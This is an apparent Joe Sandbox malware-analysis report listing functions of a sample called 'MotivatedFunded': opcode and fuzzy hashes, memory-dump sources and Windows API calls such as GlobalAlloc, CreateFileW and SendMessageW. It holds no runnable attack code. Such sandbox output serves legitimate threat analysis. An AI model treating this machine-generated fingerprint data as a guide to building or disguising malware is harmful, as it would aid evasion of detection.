                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                    • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                    • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                    • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                    Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                    • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                    • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                    • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                    Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                    • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                    • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                    • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                    Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                    • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 3394109436-0
                                                                    • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                    • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                    • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                    • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                    Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                    • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                    • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                    • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                    Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCreate
                                                                    • String ID:
                                                                    • API String ID: 415043291-0
                                                                    • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                    • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                    • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                    • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                    Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                    • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                    • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                    • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                    Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                    • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                    • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                    • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                    Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                    • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                    • String ID:
                                                                    • API String ID: 4115351271-0
                                                                    • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                    • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                    • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                    • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                    Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                    • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                    • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                    • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                    Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                    • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                    • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                    • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                    Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                    • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                    • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                    • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                    Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                    • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                    • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                    • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

                                                                    Non-executed Functions

                                                                    Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                    • DeleteObject.GDI32(?), ref: 00404A79
                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                    • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                    • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $ @$M$N
                                                                    • API String ID: 1638840714-3479655940
                                                                    • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
